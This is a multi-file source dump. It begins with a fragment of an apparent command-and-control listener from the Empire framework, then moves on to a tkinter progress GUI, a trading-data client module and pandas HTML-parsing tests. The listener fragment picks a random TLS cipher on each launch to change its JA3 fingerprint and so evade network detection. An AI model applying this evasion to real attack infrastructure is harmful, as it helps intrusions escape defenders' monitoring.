context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
# setting the cipher list allows for modification of the JA3 signature. Select a random cipher to change
# it every time the listener is launched
cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
message += "\n[!] Ensure the folder specified in CertPath exists and contains your pem and private key file."
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
|
progress.py
|
"""Small GUI for displaying resource discovery progress to the user."""
import collections
import threading
import tkinter as tk
import tkinter.messagebox
import tkinter.ttk
class LifetimeError(Exception):
"""Progress was interrupted (i.e., window closed or cancel button was pressed)."""
pass
class GuiProgressBar(tkinter.ttk.Frame):
def __init__(self, title, work_count, nowait, work_func, *func_args):
tkinter.ttk.Frame.__init__(self, relief='ridge', borderwidth=2)
self.work_count = work_count
self.worker_task = threading.Thread(target=work_func, args=func_args)
self.pending_stop = False
self.master.title(title)
self.master.protocol('WM_DELETE_WINDOW', self._confirm_quit)
self.pack(fill='both', expand=1)
self.widget_space = self._create_widgets()
if nowait:
self._start()
def _create_widgets(self):
# storage for widgets so we don't pollute GUI app instance namespace
widget_space = collections.namedtuple('WidgetSpace', [
'button_text',
'button',
'label_frame',
'label_text',
'label',
'progress_bar',
'status_label_text',
'status_label'
])
button_text = tk.StringVar(value='Start')
button = tkinter.ttk.Button(self, textvariable=button_text, command=self._start)
button.pack()
label_frame = tkinter.ttk.LabelFrame(self, text='Service:Region')
label_frame.pack(fill='x')
label_text = tk.StringVar()
label = tkinter.ttk.Label(label_frame, anchor='w', textvariable=label_text)
label.pack(fill='x')
#XXX: add small fraction to max so progress bar doesn't wrap when work finishes
progress_bar = tkinter.ttk.Progressbar(
self,
orient='horizontal',
length=self.master.winfo_screenwidth()/5,
mode='determinate',
maximum=self.work_count+1e-10
)
progress_bar.pack(fill='both')
status_label_text = tk.StringVar(value='0 / {}'.format(self.work_count))
status_label = tkinter.ttk.Label(self, anchor='w', textvariable=status_label_text)
status_label.pack(fill='x')
return widget_space(button_text,
button,
label_frame,
label_text,
label,
progress_bar,
status_label_text,
status_label)
def _confirm_quit(self):
if tkinter.messagebox.askyesno(message='Quit?'):
self.pending_stop = True
self.master.destroy()
def _confirm_cancel(self):
if tkinter.messagebox.askyesno(message='Cancel?'):
self.pending_stop = True
self.widget_space.button_text.set('Canceled')
self.widget_space.button.state(['disabled'])
def _start(self):
self.widget_space.button_text.set('Cancel')
self.widget_space.button['command'] = self._confirm_cancel
self.worker_task.start()
def update_progress(self, delta):
"""Update progress bar.
:param float delta: increment progress by some amount"""
if self.pending_stop:
raise LifetimeError('User initiated stop.')
self.widget_space.progress_bar.step(delta)
self.widget_space.status_label_text.set('{} / {}'.format(
int(self.widget_space.progress_bar['value']),
self.work_count
))
def update_svc_text(self, svc_name, region):
"""Update text in status area of GUI.
:param str svc_name: service name
:param str region: region name
"""
self.widget_space.label_text.set('{}:{}'.format(svc_name, region))
def finish_work(self):
"""Update GUI when work is complete."""
self.widget_space.button.state(['disabled'])
self.widget_space.button_text.set('Finished')
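# Minimal usage sketch (not part of the original module; the worker signature and
# names below are assumptions). The worker is handed a mutable holder that is
# filled with the GuiProgressBar after construction, then reports progress via
# update_svc_text()/update_progress() and calls finish_work() when done.
if __name__ == '__main__':
    import time

    def _demo_worker(holder):
        bar = holder[0]
        try:
            for svc, region in (('svc-a', 'region-1'), ('svc-b', 'region-2')):
                bar.update_svc_text(svc, region)
                time.sleep(0.2)  # stand-in for real discovery work
                bar.update_progress(1)
            bar.finish_work()
        except LifetimeError:
            pass  # user cancelled or closed the window

    _holder = []
    _bar = GuiProgressBar('Discovery demo', 2, False, _demo_worker, _holder)
    _holder.append(_bar)
    _bar.mainloop()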
|
common.py
|
import typing as tp
import datetime
import os
import logging
from urllib.parse import urljoin
import urllib.error
import sys
import urllib.request
import time
import json
import math
import gzip
import xarray as xr
import numpy as np
import pandas as pd
import re
from qnt.log import log_info, log_err
import pickle, hashlib
import io
import progressbar
MAX_DATE_LIMIT: tp.Union[datetime.date, None] = None
MAX_DATETIME_LIMIT: tp.Union[datetime.datetime, None] = None
DEFAULT_TAIL = 6 * 365
class Fields:
OPEN = "open"
LOW = "low"
HIGH = "high"
CLOSE = "close"
VOL = "vol"
DIVS = "divs" # only for stocks
SPLIT = "split" # only for stocks
SPLIT_CUMPROD = "split_cumprod" # only for stocks
IS_LIQUID = "is_liquid" # only for stocks
OPEN_INTEREST = "oi" # only for futures
ROLL = "roll" # only for futures
f = Fields
class Dimensions:
TIME = 'time'
FIELD = 'field'
ASSET = 'asset'
ds = Dimensions
TIMEOUT = 60
RETRY_DELAY = 1
def get_env(key, def_val, silent=False):
if key in os.environ:
return os.environ[key]
else:
if not silent:
log_err("NOTICE: The environment variable " + key + " was not specified. The default value is '" + def_val + "'")
return def_val
ACCESS_KEY = get_env('API_KEY', '')
BASE_URL = get_env('DATA_BASE_URL', 'https://data-api.quantiacs.io/')
def request_with_retry(uri, data):
url = urljoin(BASE_URL, uri)
cached = cache_get(url, data)
if cached is not None:
return cached
retries = sys.maxsize if "SUBMISSION_ID" in os.environ else 5
for r in range(0, retries):
try:
req = urllib.request.Request(url, data, headers={'Accept-Encoding': 'gzip', "X-Api-Key": api_key})
with urllib.request.urlopen(req, timeout=TIMEOUT) as response:
length = response.getheader('content-length')
if length:
length = int(length)
blocksize = max(4096, length//100)
else:
blocksize = 4096
length = None
buf = io.BytesIO()
size = 0
sys.stdout.flush()
with progressbar.ProgressBar(max_value=length, poll_interval=1) as p:
while True:
buf1 = response.read(blocksize)
if not buf1:
break
buf.write(buf1)
size += len(buf1)
p.update(size)
sys.stderr.flush()
response_body = buf.getvalue()
if response.getheader('Content-Encoding') == 'gzip':
response_body = gzip.decompress(response_body)
cache_put(response_body, url, data)
return response_body
except KeyboardInterrupt:
raise
except:
logging.exception("download error: " + uri)
time.sleep(RETRY_DELAY)
raise Exception("can't download " + uri)
def parse_date(dt: tp.Union[None, str, datetime.datetime, datetime.date]) -> datetime.date:
if dt is None:
res = datetime.date.today()
else:
res = pd.Timestamp(dt).date()
if MAX_DATE_LIMIT is not None:
if res is not None:
res = min(MAX_DATE_LIMIT, res)
else:
res = MAX_DATE_LIMIT
return res
def parse_tail(tail: tp.Union[datetime.timedelta, int]):
return tail if type(tail) == datetime.timedelta else datetime.timedelta(days=tail)
def parse_date_and_hour(dt: tp.Union[None, str, datetime.datetime, datetime.date]) -> datetime.datetime:
if dt is None:
res = datetime.datetime.now()
else:
res = pd.Timestamp(dt).to_pydatetime()
if MAX_DATETIME_LIMIT is not None:
if res is not None:
res = min(MAX_DATETIME_LIMIT, res)
else:
res = MAX_DATETIME_LIMIT
return res
def datetime_to_hours_str(dt: datetime.datetime) -> str:
return dt.strftime("%Y-%m-%dT%H")
def parse_max_datetime_from_url(url):
r = re.compile("^.+/(\\d{4}-\\d{2}-\\d{2}T\\d{2})/{0,1}$")
m = r.match(url)
if m is not None:
return parse_date_and_hour(m.group(1))
r = re.compile("^.+/(\\d{4}-\\d{2}-\\d{2})/{0,1}$")
m = r.match(url)
if m is not None:
return parse_date_and_hour(m.group(1))
return None
def deprecated_wrap(origin):
import sys, traceback
stack = traceback.extract_stack(limit=2)
deprecated_name = stack[-2][3].split("=")[0].strip()
try:
f = sys._getframe(1)
deprecated_name = f.f_locals['__name__'] + '.' + deprecated_name
except:
pass
def wrap(*args, **kwargs):
log_err('WARNING: ' + deprecated_name + ' deprecated, use ' + origin.__module__ + '.' + origin.__name__)
return origin(*args, **kwargs)
return wrap
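# Usage sketch (illustrative names): assigning the wrapper to a legacy name makes
# calls through that name log a deprecation warning and forward to the new function.
#
#   load_data_legacy = deprecated_wrap(load_data)
#   load_data_legacy(...)  # logs "WARNING: ... deprecated, use <module>.load_data"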
CACHE_RETENTION = datetime.timedelta(days=float(get_env('CACHE_RETENTION', '7')))
CACHE_DIR = get_env('CACHE_DIR', 'data-cache')
def cache_get(*args):
crop_cache()
p = pickle.dumps(args)
key = hashlib.sha1(p).hexdigest()
value_fn = os.path.join(CACHE_DIR, key + ".value.pickle.gz")
args_fn = os.path.join(CACHE_DIR, key + ".args.pickle.gz")
if os.path.exists(value_fn) and os.path.exists(args_fn):
try:
old_args = pickle.load(gzip.open(args_fn, 'rb'))
if old_args == args:
old_data = pickle.load(gzip.open(value_fn, 'rb'))
return old_data
except Exception as e:
log_err("Cache read problem:", e)
return None
def cache_put(value, *args):
if CACHE_RETENTION.total_seconds() == 0:
return
p = pickle.dumps(args)
key = hashlib.sha1(p).hexdigest()
value_fn = os.path.join(CACHE_DIR, key + ".value.pickle.gz")
args_fn = os.path.join(CACHE_DIR, key + ".args.pickle.gz")
pickle.dump(args, gzip.open(args_fn, 'wb', compresslevel=5))
pickle.dump(value, gzip.open(value_fn, 'wb', compresslevel=5))
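# Usage sketch: values are keyed by the SHA-1 of the pickled argument tuple, so
# cache_get() with the same arguments returns what cache_put() stored
# (the URL and body below are illustrative only).
#
#   cache_put(b'payload', 'https://example.invalid/uri', b'request-body')
#   assert cache_get('https://example.invalid/uri', b'request-body') == b'payload'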
def crop_cache():
global cache_min_mod_time
now = datetime.datetime.now()
if cache_min_mod_time is not None and datetime.datetime.now() - cache_min_mod_time < CACHE_RETENTION:
return
cache_min_mod_time = None
for fn in os.listdir(CACHE_DIR):
full_name = os.path.join(CACHE_DIR, fn)
if not os.path.isfile(full_name):
continue
m_time = os.path.getmtime(full_name)
m_time = datetime.datetime.fromtimestamp(m_time)
if now - m_time > CACHE_RETENTION:
os.remove(full_name)
else:
if cache_min_mod_time is None or cache_min_mod_time > m_time:
cache_min_mod_time = m_time
cache_min_mod_time = None
os.makedirs(CACHE_DIR, exist_ok=True)
if MAX_DATE_LIMIT is None:
MAX_DATETIME_LIMIT = parse_max_datetime_from_url(BASE_URL)
MAX_DATE_LIMIT = None if MAX_DATETIME_LIMIT is None else MAX_DATETIME_LIMIT.date()
api_key = os.environ.get("API_KEY", '').strip()
tracking_host = os.environ.get("TRACKING_HOST", "https://quantiacs.io")
if api_key != 'default':
if api_key == '':
log_err("Please, specify the API_KEY.")
log_err("See: https://quantiacs.io/documentation/en/user_guide/local_development.html")
sys.exit(1)
else:
url = tracking_host + "/auth/system/account/accountByKey?apiKey=" + api_key
try:
resp = urllib.request.urlopen(url)
except urllib.error.HTTPError as e:
if e.code == 404:
log_err("Wrong API_KEY.")
log_err("See: https://quantiacs.io/documentation/en/user_guide/local_development.html")
sys.exit(1)
sent_events = set()
def track_event(event):
if os.environ.get("SUBMISSION_ID", '') != '':
return
if event in sent_events:
return
sent_events.add(event)
import threading
url = tracking_host + '/engine/tracklib?apiKey=' + api_key + '&event=' + event
if 'STRATEGY_ID' in os.environ:
url = url + '&strategyId=' + os.environ.get('STRATEGY_ID', '')
t = threading.Thread(target=get_url_silent, args=(url,))
t.start()
def get_url_silent(url):
try:
urllib.request.urlopen(url)
except:
pass
if __name__ == '__main__':
log_info(parse_max_datetime_from_url('http://hl.datarelay:7070/last/2020-10-07T10/'))
log_info(parse_max_datetime_from_url('http://hl.datarelay:7070/last/2016-10-28/'))
# t = parse_max_datetime_from_url('http://hl.datarelay:7070/last/2020-10-07T10/')
# print(datetime.datetime.combine(t.date(), datetime.time.min))
# TODO Strange stuff, need to check usage
def from_xarray_3d_to_dict_of_pandas_df(xarray_data):
assets_names = xarray_data.coords[ds.ASSET].values
pandas_df_dict = {}
for asset_name in assets_names:
pandas_df_dict[asset_name] = xarray_data.loc[:, :, asset_name].to_pandas()
return pandas_df_dict
def from_dict_to_xarray_1d(weights):
weights_assets_list = [key for key in weights]
weights_values_list = [weights[key] for key in weights]
return xr.DataArray(weights_values_list, dims=[ds.ASSET], coords={ds.ASSET: weights_assets_list})
def filter_liquids_xarray_assets_dataarray(assets_xarray_dataarray):
liquid_xarray_assets_dataarray = assets_xarray_dataarray \
.where(assets_xarray_dataarray.loc[:, 'is_liquid', :] == 1) \
.dropna(ds.TIME, 'all').dropna(ds.ASSET, 'all')
return liquid_xarray_assets_dataarray
def check_weights_xarray_dataarray_for_nonliquids(xarray_weights_dataarray, xarray_assets_dataarray):
non_liquid_weights = xarray_weights_dataarray.where(xarray_assets_dataarray[0].loc['is_liquid', :] == 0)
non_liquid_weights = non_liquid_weights.where(non_liquid_weights != 0)
non_liquid_weights = non_liquid_weights.dropna(ds.ASSET)
if len(non_liquid_weights) > 0:
raise Exception(non_liquid_weights.coords[ds.ASSET].values)
def exclude_weights_xarray_dataarray_from_nonliquids(weights_xarray_dataarray, assets_xarray_dataarray):
liquid_weights_xarray_dataarray = weights_xarray_dataarray \
.where(assets_xarray_dataarray[0].loc['is_liquid', :] == 1) \
.dropna(ds.ASSET, 'all')
return liquid_weights_xarray_dataarray
# ///
|
test_html.py
|
from functools import partial
from importlib import reload
from io import BytesIO, StringIO
import os
import re
import threading
from urllib.error import URLError
import numpy as np
from numpy.random import rand
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import DataFrame, Index, MultiIndex, Series, Timestamp, date_range, read_csv
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
"len(list1) == {0}, "
"len(list2) == {1}".format(len(list1), len(list2))
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, "google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=td.skip_if_no("bs4")),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{0:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@tm.network
def test_banklist_url(self):
url = "http://www.fdic.gov/bank/individual/failed/banklist.html"
df1 = self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "table"}
)
df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, ".*Water.*")
df2 = self.read_html(url, "Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(self.banklist_data, ".*Florida.*", attrs={"id": "table"})
df2 = self.read_html(self.banklist_data, "Metcalf Bank", attrs={"id": "table"})
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, ".*Water.*")
df2 = self.read_html(self.spam_data, "Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, ".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, "Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=range(2))[0]
df2 = self.read_html(self.spam_data, "Unit", skiprows=range(2))[0]
tm.assert_frame_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, "Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, "Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, "Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, "Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, "Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, ".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, "Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, ".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, ".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, "Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, ".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, "Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, ".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, "Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, ".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, "Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, ".*Water.*")
df2 = self.read_html(data2, "Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, ".*Water.*")
df2 = self.read_html(data, "Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, ".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, "Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
try:
with pytest.raises(URLError):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
except ValueError as e:
assert "No tables found" in str(e)
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), "First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, "First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, "Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, "Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
@pytest.mark.slow
def test_thousands_macau_stats(self, datapath):
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "html", "macau.html")
dfs = self.read_html(macau_data, index_col=0, attrs={"class": "style1"})
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.items())
@pytest.mark.slow
def test_thousands_macau_index_col(self, datapath, request):
# https://github.com/pandas-dev/pandas/issues/29622
# This test fails for bs4 >= 4.8.0, so handle xfail accordingly
if self.read_html.keywords.get("flavor") == "bs4" and td.safe_import(
"bs4", "4.8.0"
):
reason = "fails for bs4 version >= 4.8.0"
request.node.add_marker(pytest.mark.xfail(reason=reason))
all_non_nan_table_index = -2
macau_data = datapath("io", "data", "html", "macau.html")
dfs = self.read_html(macau_data, index_col=0, header=0)
df = dfs[all_non_nan_table_index]
assert not any(s.isna().any() for _, s in df.items())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot elements containing td or th.
An empty tfoot is ignored.
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath("io", "data", "html", "nyse_wsj.html")
df = self.read_html(data, index_col=0, header=0, attrs={"class": "mdcTable"})[0]
expected = Index(
[
"Issue(Roll over for charts and headlines)",
"Volume",
"Price",
"Chg",
"% Chg",
]
)
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, "Metcalf", attrs={"id": "table"})[0]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols]._convert(datetime=True, coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data, "r") as f:
raw_text = f.read()
assert gc in raw_text
